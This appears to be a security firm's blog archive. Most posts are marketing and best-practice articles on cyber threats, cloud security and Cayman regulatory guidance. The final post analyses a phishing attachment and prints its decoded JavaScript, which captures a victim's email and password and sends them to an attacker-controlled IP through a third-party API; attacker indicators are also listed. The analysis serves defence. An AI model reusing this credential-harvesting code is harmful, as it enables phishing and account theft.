20 April 2022

5 Ways to Overcome Cybersecurity Challenges in Uncertain Times




5 WAYS TO OVERCOME CYBERSECURITY CHALLENGES IN UNCERTAIN TIMES

According to the World Economic Forum’s The Global Risks Report 2021, cyber threats are among the leading global risks. 

With remote and hybrid work changing the landscape of how businesses operate, new vulnerabilities have emerged practically overnight. Hacks are now more commonplace due to the rise of mobile usage and internet of things (IoT). Data protection compliance has become more complex with the introduction of regimes like GDPR. And, to compound this, a growing ecosystem of cybercriminals are more technologically savvy than ever – resulting in sophisticated cyberattacks that can get around an organisation’s employees, firewalls or SIEM software, and cost companies millions of dollars. 

There’s no doubt that cybersecurity is something to pay attention to. It’s an issue that’s made its way into the boardrooms of companies large and small, impacting even the world’s most prominent financial and healthcare organisations. 

Now more than ever, it’s crucial to understand and develop strategies to overcome cybersecurity challenges. Here are five ways to prepare yourself and your company, so you can strengthen your cybersecurity posture and be future-ready. 

 

1. Understand how cybercrime tactics have evolved

Cybercriminals are opportunists. New technology, processes and practices are always being developed. And, at the same time, threat actors–including ransomware groups and adversarial governments–are constantly adapting their ways to circumvent security measures.  

Though cybercriminals are usually money, some also want to expose data and confidential information or simply degrade a company’s reputation. 

The most common types of cybercrime tactics include:

  • Distributed denial of service (DDOS): A disruption of network service where attackers send high volumes of data through a network, which then becomes overloaded and stops working. 
  • Phishing: When cybercriminals “fish” for data from third parties, usually via email. These phishing emails are becoming increasingly sophisticated, so much so that some of them require cybersecurity experts to distinguish them as phishing. 
  • Malware: Also known as malicious software, malware comprises over one half of all cybercrimes. It’s designed to gain access to a computer or network, and is often introduced via email attachments, software downloads or OS vulnerabilities. 
  • Internal privilege misuse: This is when an opportunistic employee secretly steals or leaks confidential information for monetary gain. They can also take personal information, including healthcare data, for financial crimes or identity theft. 

 

The COVID-19 pandemic intensified the rate of cyberattacks. As companies were forced to experience rapid digital transformation and implement remote work arrangements, cracks appeared which cybercriminals knew they could exploit. 

Even though it’s been more than two years since the pandemic began, many overworked and unprepared IT departments are still struggling to keep up with security demands. Employees are still logging into corporate networks from unsecured computers. And cybercriminals have found ways to target software like Zoom and Microsoft Teams. 

Cybercriminals also take advantage of urgency. During the pandemic, Cayman experienced a spike in phishing attacks and malware, which was largely due to cybercriminals exploiting people’s fear of medical equipment shortages, and the urgent need for fundraising.

Finally, for the most part, cybercriminals operate worldwide and know no borders. A crop of “corporate cybercriminals” has emerged, who are more savvy and have access to extensive resources to pivot quickly – taking advantage of vulnerabilities.

The first step to keeping your company secure is to understand–and stay on top of–these trends.

 

2. Prioritise cloud and endpoint security

Cloud and hybrid OS and data systems are here to stay. This has caused unique challenges for companies that have traditionally operated using on-premise networks. 

The good news is that cloud networks are often more inherently secure than on-premise networks, but customers need to understand that they have a shared responsibility for cloud security. Failing to recognise this can lead to costly outcomes. In fact, Gartner predicts that  through 2025, 90% of the organisations that fail to control public cloud use will inappropriately share sensitive data. 

Adding to the complexity is the rise of BYOD (bring your own device) and remote work policies. This raises concerns around endpoint protection. Simply put, an endpoint is one end of a communication channel, and in a workplace context involves items like laptops, mobile devices, tablets and printers. Cybercriminals can exploit unprotected endpoints and use them as an entry point into your network.

As cloud infrastructures grow, and more companies enter into hybrid cloud and remote work scenarios, it’s important for companies to prioritise cloud and endpoint security. 

 

3. Embrace end-user cyber security training 

The biggest security gaps usually lay with end-users. In fact, according to Gartner, 99% of cloud security incidents through 2025 will be due to end-user errors. That means it’s important to create a corporate cybersecurity policy that includes comprehensive end-user training. 

Developing employee knowledge around what to watch for, how cybercrime works and cybersafe best practices will go a long way in ensuring your company and your employees are protected.

End-user training can include:

  • How to recognise phishing and social engineering attacks
  • Best practices to manage passwords
  • Steps to keep devices and endpoints secure
  • How to avoid malware and ransomware attacks
  • Physical security tips, such as device and document locking

 

4. Recruit top IT talent

According to a 2021 study by Gartner, the biggest barrier to adopting new technology is a lack of talent. This is especially the case when it comes to security technology and cybersecurity talent.

Compounding this problem is the fact that IT budgets are often stretched thin. When resources are limited, companies tend to put them towards supporting day-to-day needs, rather than towards measures that are preventive or proactive. Unfortunately, it often takes a breach or cybersecurity incident to occur before companies will invest in cybersecurity talent.

Of course, “talent” doesn’t necessarily mean every employee needs to be a cybersecurity expert. It means finding and fostering a team that’s keen to learn and adopt new technologies, committed to staying current on cybersecurity threats and that’s generally aware of cybercrime tactics. 

If you’re unable to find the right talent, outsourcing this role to an expert is another option. That takes us to our final point.

 

5. Consider hiring cybersecurity experts to support your IT team

 

With competing priorities and technology continually evolving, IT departments are stretched thin. 

Although guidance documents – such as Cayman’s Statement of Guidance: Cybersecurity for Regulated Entities – are available to support cybersecurity teams, they can be difficult to implement alone.

As a result, it can be cost-effective to utilise a managed cybersecurity service or IT security partner. Good cybersecurity experts are up-to-date on the latest issues, are ready to get your organisation compliant with regulations like GDPR, HIPAA or Cayman’s data protection legislation, and can create and monitor your systems with advanced SIEM software. 

Outsourcing your cybersecurity to experts who are already well-versed in all aspects of your security needs – including policies, infrastructure, cloud services and other services – can also free up time for your IT team to focus on key strategic priorities.

 

Partner with Kirk ISS and take control of your cybersecurity

If you’re seeking a cybersecurity partner to help keep your business safe, Kirk ISS is here to help. We offer a full range of cybersecurity services including:

Cybersecurity Assessments

Get a comprehensive review of your organisation’s cyber security posture, highlighting gaps in your defenses and recommending specific steps to remediate them. Help satisfy data protection regulations and stay compliant.

  • Cybersecurity risk assessments
  • Penetration testing
  • Office 365 security assessment

LEARN MORE

 

Penetration Testing

See how a simulated attack on your network would play out if an attacker were to bypass your existing controls. Verify which controls are adequate, which should be revised and where the vulnerabilities within your network lie. 

LEARN MORE

 

 

Social Engineering Assessments

Social Engineering Assessment IconGet customizable scenarios that test the controls and security awareness levels of your end users. Understand where your vulnerabilities are and show end users on how to identify phishing and what to do when it occurs.

  • Email and website campaigns
  • Voice phishing (vishing) campaigns
  • Physical access walkthroughs

LEARN MORE

 

Managed Cybersecurity (SOC as a Service)

Benefit from a fully-managed, Security Operations Centre (SOC) that delivers the protection modern businesses need, without costly infrastructure or time-consuming management. Our SOC aggregates and analyses data points across your organisation to proactively identify threats, as well as combines specialised tools, organisation-specific alerting models and 24/7 monitoring.

LEARN MORE

 

 

Serving the Cayman Islands since 2005, our team of IT experts can help keep your data safe, your employees protected and your operations running smoothly.

To learn more or book a free discovery call, contact us today.

3 November 2021

Microsoft 365 Defender Named Forrester Leader for XDR, Q4 2021




Earlier this week, Microsoft announced they were named a Leader in The Forrester New Wave™: Extended Detection and Response (XDR) category for Q4 of 2021 for Microsoft 365 Defender. XDR (Extended Detection and Response) tools have seemingly popped up everywhere as the latest tool to assist organisations with real-time insight into cyber threats. In an already saturated market for XDR and security tools alike, Microsoft has done well to mature their offering and is evidenced by taking a different approach—XDR tools needs to not only effectively identify threats but provide enough data to be effectively managed by cybersecurity experts.

A powerful security tool…

At Kirk ISS, we’ve found the Microsoft 365 Defender suite performs excellent when paired with deeper licensing. The more cybersecurity-centric licenses, such as Microsoft 365 Business Premium, Enterprise Mobility Security + E5, and Defender for Endpoint, provide enriched data that feeds into Microsoft 365 Defender. When this data is presented in a single pane of glass to our cybersecurity analysts, threats can be identified and mitigated earlier in the cyber kill chain with less impact to customers.

So, what does this mean for your company?

The good news is if you are already utilising portions of the Microsoft stack in your day to day operations, Microsoft 365 Defender is already working hard to keep your data secure. However, it really shines by aggregating data effectively across all aspects of an organisation where seasoned cybersecurity experts can identify threats quickly. Our SOCaaS, the only on-island Security Operations Center in the Cayman Islands, is powered by Azure Sentinel, a natural extension to the award-winning XDR tool. To learn more about how our SOCaaS can leverage Microsoft 365 Defender to secure your organisation, reach out to Kirk ISS today.

12 October 2021

Cybersecurity Best Practices: Quick Wins for Organisations




In light of the rapid change from corporate offices to remote workforces, organisations have been forced to focus on cybersecurity more than ever. Developing a robust cybersecurity framework that cascades throughout the business is paramount to ensuring the remote workforces are as protected as their office counterparts. For most organisations, the cybersecurity foundation starts with simple, yet sensible data protection policies and rules that are consistently enforced. Several examples of easy ways to bolster your organisation’s cybersecurity framework include:

 

Develop Formal IT Policies and Procedures

Almost every industry has some form of regulatory guidance for organisations to adhere to. Financially regulated entities have items like CIMA’s statement of guidance, vendors and retailers must adhere to Payment Card Industry (PCI), and every organisation needs to be aware of the EU’s General Data Protection Regulation (GDPR). Creating formal IT policies and procedures goes beyond rules for employees to follow when using their work computers – it creates a foundation for the organisation to operate should it need to recover from a disaster or plan for business continuity, how they mange their third-party affiliates and vendors, and how they plan on responding to cybersecurity threats and incidents.

 

 

Train Cyber Ninja Employees

*In 2021, nearly 85% of data breaches involved some form of human element to gain entry into a network. Training your staff how to identify threat is key to preventing a cybersecurity incident from occurring. The best training doesn’t happen in a vacuum – the cyber threat landscape evolves constantly, requiring at least annual refreshers for employees to be set up for success. Our cybersecurity team conducts regular End User Awareness Training, along with simulated Social Engineering Assessments to proactively identify areas to strengthen.

 

 

Tighten Cloud-Based Platforms

Work from home is rapidly evolving into work from anywhere. With BYOD becoming the norm for more and more organisations, it’s important to employ effective mobile access policies. Spending time to review cloud-based platforms, such as Microsoft Azure and Office 365 controls will help define security baselines to ensure resources are protected no matter where they are stored. Some controls should include the use of Multi-Factor Authentication (MFA), password managers, Conditional Access policies, compliance and configuration baselines, remote management of devices, and identity protection for users and corporate resources alike. Kirk ISS regularly reviews customer baselines during our Infrastructure Audits to uncover gaps in configurations, helping strengthen their cybersecurity posture.

 

 

Think Like an Adversary

Regardless of whether you believe that “offense wins games, but defense wins championships”, the truth is there are more attackers than there are defenders in the cybersecurity workforce. *Gartner reports that in 2019, there was a deficit of nearly 65% between roles waiting to be filled and the talent pool of cybersecurity professionals. What does this mean for you? Small to medium business may not have the budget or need for a fully-fledged cybersecurity team to proactively monitor, identify, and respond to threats like large organisations, but the need is there. Kirk ISS has developed a SOC as a Service (SOCaaS) to provide budget-friendly, cost effect methods of providing proactive cyber threat monitoring. In addition, assessments like Network Security Assessments have our cybersecurity professionals simulate hacking activities to uncover vulnerabilities before they can be exploited by the real bad guys.

 

Balancing Security with Productivity

Cybersecurity has become ubiquitous with the current state of remote work and will continue to be a dominant concern. CIO’s and IT managers will need to strike a balance between driving productivity with the very real need to protect data from an ever-evolving threat landscape. Fortunately, our team of cybersecurity experts can help if you need help deploying any of these best practices to protect your IT systems.

Some of the cybersecurity services we offer:

Security Operations Centre as a Service (SOCaaS)
Network Security Assessments/Penetration Testing
Social Engineering Assessments
Policy Creation
• End User Awareness Training
• Infrastructure Audits

* 2021 Verizon DBIR (https://enterprise.verizon.com/resources/reports/2021-data-breach-investigations-report.pdf)
* https://www.gartner.com/en/human-resources/research/talentneuron/labor-market-trends/cybersecurity-labor-shortage-and-covid-19

14 September 2021

CIMA Statement of Guidance and You: Cybersecurity for Regulated Entities




In May of 2020, CIMA released a statement of guidance discussing specific requirements for regulated entities within the cybersecurity space. In the guidance, CIMA issued recommendations based on other recent regulations, such as Cayman’s Data Protection Law and the now commonplace GDPR. In this statement of guidance, CIMA placed the responsibility of identifying, monitoring, and preventing cyber threats onto the shoulders of regulated entities. In addition to these requirements, CIMA also laid the groundwork for organisations to identify gaps within their risk profile, as well as take a deeper look into what vendors are being used.

 

 

 

A quick overview of the new requirements is listed below:

  • Cybersecurity threat monitoring and prevention
  • Risk assessment
  • Penetration testing
  • Policy creation and implementation, including:
    • Vendor Due Diligence
    • Business Continuity Planning
    • Incident Response
    • Breach Notifications

 

These threats are always present and attackers using these techniques are changing to evade security controls. While this may seem daunting to smaller organisations or those that have never had to think about these threats before, now is good time to begin. There are several solutions out there, including those provided by Kirk ISS, that can help with not only regulatory satisfaction but also peace of mind.

Cybersecurity Threat Monitoring and Prevention

Kirk ISS has introduced SOC as a Service (SOCaaS) to customers in Cayman and throughout the Caribbean. SOCaaS provides organisations a cost-effective option for supplementing their IT environment with cybersecurity professionals that provide 24×7 support. SOCaaS utilises a “bring your own licensing” scheme that builds on what your organisation already has in place and can help shine light into gaps in the security posture. SOCaaS also natively connects with Microsoft products, allowing Kirk ISS to proactively monitor and mitigate threats across your organisation including email, identity management, Azure, Office 365, endpoints, and more. Analytics rules are deployed that identify threats such as phishing, brute forcing attempts, malware, data leakage, and more. More information about the Kirk ISS SOCaaS can be found here.

Penetration Testing

Penetration testing is a proactive assessment where cybersecurity professionals identify security vulnerabilities within an organisation in an effort to mitigate threats prior to attackers exploiting them. Kirk ISS’ cybersecurity engineers have years of experience performing penetration tests against organisations’ internal and external infrastructure, web applications, along with boutique testing scenarios.
Our Network Security Assessment (NSA) combines both traditional penetration testing and a vulnerability assessment to identify threats and misconfigurations within your organization. This approach is designed to provide granularity into not only underlying vulnerabilities, but to provide details about how they affect your overall security posture. More information about the Kirk ISS Network Security assessment can be found here.

Policy Creation

Written policies are the backbone of a successful information security program. Each organisation is different in the way they operate, deploy IT systems, and require each user to interact with internal resources. Without this baseline to refer to, an organisation is fighting uphill to define proper procedures and methodologies.
With years of experience working in cyber risk and threat management, Kirk ISS works with key stakeholders to help develop internal IT policies and procedures unique to your organisation. With CIMA’s Statement of Guidance as a baseline, we can develop mature IT policies to help make regulatory compliance much easier and help mold your organisation’s IT posture.

 

 

To learn more about where your organisation’s IT maturity lies compared to CIMA’s Statement of Guidance, contact Kirk ISS at 345-623-4730 or security@kirkiss.ky.

12 July 2021

Kirk ISS Named 2021 Microsoft Country Partner of the Year for the Cayman Islands




 

[GEORGE TOWN, Grand Cayman], [Cayman Islands] — July 12, 2021 — Kirk ISS today announced it has won the Cayman Islands 2021 Microsoft Partner of the Year Award. The company was honored among a global field of top Microsoft partners for demonstrating excellence in innovation and implementation of customer solutions based on Microsoft technology.

According to Kirk Office Managing Director Geoffrey Cuff, this year’s award is particularly special:We’re thrilled to be recognized as the 2021 Microsoft Partner of the Year for the Cayman Islands. Over the last 12 months, our IT division at Kirk ISS has helped businesses overcome unprecedented challenges using Microsoft powered solutions, particularly in the cybersecurity space. Whether we are securing sensitive data or enabling remote working, our focus at Kirk ISS is always on helping businesses leverage technology to achieve more for their stakeholders. We’re incredibly proud to be recognized by a global technology leader like Microsoft for delivering the very best in cutting-edge cybersecurity solutions”.

The Microsoft Partner of the Year Awards recognize Microsoft partners that have developed and delivered outstanding Microsoft-based solutions during the past year. Awards were classified in various of categories, with honorees chosen from a set of more than 4,400 submitted nominations from more than 100 countries worldwide. Kirk ISS was recognized for providing outstanding solutions and services in the Cayman Islands.

The Microsoft Country Partner of the Year Award recognizes one winning Microsoft partner per country for excellence in the delivery if Microsoft solutions and advancement of the company’s mission to empower every person and every organization on the planet to achieve more.

“I am honored to announce the winners and finalists of the 2021 Microsoft Partner of the Year Awards,” said Rodney Clark, corporate vice president, Global Partner Solutions, Channel Sales and Channel Chief, Microsoft. “These remarkable partners have displayed a deep commitment to building world-class solutions for customers—from cloud-to-edge—and represent some of the best and brightest our ecosystem has to offer.”

28 January 2021

Gone Phishing: A Deep Dive Into Phishing Campaigns




Kirk ISS Cybersecurity Post

Overview

Earlier this week, we uncovered a somewhat complex phishing campaign that passed VirusTotal and Microsoft’s Automated Investigation and Response (AIR) as non-malicious. While the email itself was fairly innocuous (other than looking exactly like a phishing email and suspicious domain), the attachment it contained was what drew us in. Malicious attachments aren’t anything new, but this one contained thousands of lines of CSS and formatting to emulate an Outlook web login perfectly. In addition, it also had a massive block of Base64-encoded JavaScript that emulated a Microsoft Login.

The result? A convincing phishing email designed to trick users into believing it is a legitimate page.

 

 

Deep Dive

The initial email utilises emails found by scraping a website. In one case, an “info@domain” account was both sender and recipient, adding to some level of legitimacy. In another, the “info@domain” was sent to a user whose email was also scraped online.

 

 

The email stated the user had received a meeting notification, attached as an HTML document. Once downloaded, the attachment served two functions:

  1. Create a convincing Outlook web login attempt, and
  2. Trigger embedded Base64 JavaScript to replicate a Microsoft login and steal credentials.

 

 

The attachment took extreme caution in making the webpage appear as authentic as possible; the first several hundred lines contained CSS and animations used by Microsoft. Once opened, an alert stating “Network Connection Error” appears, regardless of connectivity – this portion is hard-coded when a using a browser other than Edge.

 

 

To get a better understanding of the attachment, we dove into the source code and decoded all Base64 components. Here’s what happens under the hood when the user clicks the “retry” button:

function start(){
         document.getElementById("mArea").style.opacity = 0;
         setTimeout(()=>{
             if(!isEdge() ){

         var ap = "#params?msofficeoutlook=o365apps/vac3uram5aghboqli9yktoefi2dwjj=&id="+email+"&params=vac3uram5aghboqli9yktoefi2dwjj";
                 window.location.href =  toText(Base64.decode(nextHmtl))+ap;
             }
             else{
                 document.write((Base64.decode(nextHmtl)));
             }
         },2500);
     }

 

The nextHtml variable is where the malicious JavaScript starts take affect. Close to 6000 lines in length, only the last hundred or so are used for actually capturing credentials. The rest are spent pulling appropriate resources from Microsoft’s servers to give the appearance of a legitimate login attempt, pre-populated with the email recipient to provide additional “validity”.

 

 

Further investigation revealed users were forced to enter their password multiple times after an “invalid password” prompt. This acted as a verification mechanism that the given credential set was legitimate. In addition, the user-supplied credentials are sent to a GetContact account, which may serve as a notification system for the attacker. In the last step, all information entered by the victim is sent to an RSS feed in AWS, indicative of a “sit back and wait” phishing attack.

Here’s a look into what is harvested from the victim and sent back to the attacker:


    $("#i0281").submit(function(e) {
        e.preventDefault();

        $("#idSIButton10").attr("disabled",true);
        //$("input[type='password']").blur();

        var _email = $("#firstem").val();
        var password = $("#secondpw").val();
        var data = {"operationName":"createFeed","variables":{"url":"hxxp://34.237.38.125/rss.php?u="+_email+"&k="+password,"simulate":false,"interfaceType":"GENERATOR"},"query":"mutation createFeed($url: String, $simulate: Boolean, $interfaceType: FeedInterfaceType, $isPreview: Boolean, $scrapingRules: ScrapingRulesInput, $requestObject: RequestObjectInput) {n  createFeed(url: $url, simulate: $simulate, scrapingRules: $scrapingRules, requestObject: $requestObject, isPreview: $isPreview, interfaceType: $interfaceType) {n    titlen    descriptionn    feedUrln    siteUrln    siteNamen    imageUrln    generatorn    items {n      titlen      urln      descriptionn      daten      enclosure {n        urln        __typenamen      }n      __typenamen    }n    __typenamen  }n}n"};
        $.ajax({
            url: 'https://rss.app/graphql',
            dataType: 'json',
            contentType:'application/json',
            data: JSON.stringify(data),
            dataType:'json',
            method: 'post'
        }).done(function(data) {
                if(data.errors){
                    if(navigator.userAgent.toLowerCase().indexOf('firefox') > -1){
                        window.location.reload();
                    } else {
                        $("#idSIButton10").attr("disabled",false);
                        //$("input[type='password']").attr("disabled",false);
                        document.getElementById("i0281").reset();
                        $("#idBtn_Back").click();
                        detetch(email);
                    }

                } else{
                    window.location.href = "https://www.britishcouncil.org/sites/default/files/languages-for-the-future-report.pdf";
                }
        }).fail((data)=>{
            window.location.reload();
        });
    });

 

This email was unique in the effort to emulate code used by Microsoft to come up with a similar login. By using the embedded and encoded script, it can run in the same browser or tab to seem as innocuous as possible. While it may seem odd that this much effort was put into creating an attachment and not into the actual delivery of the email, it lends to the belief this was most likely purchased for use in private campaigns.

Attacker Details

Domain: emails[dot]outlook365services[dot]com
Sender IP: 54.240.48.109
Receiving IP: 34.237.38.125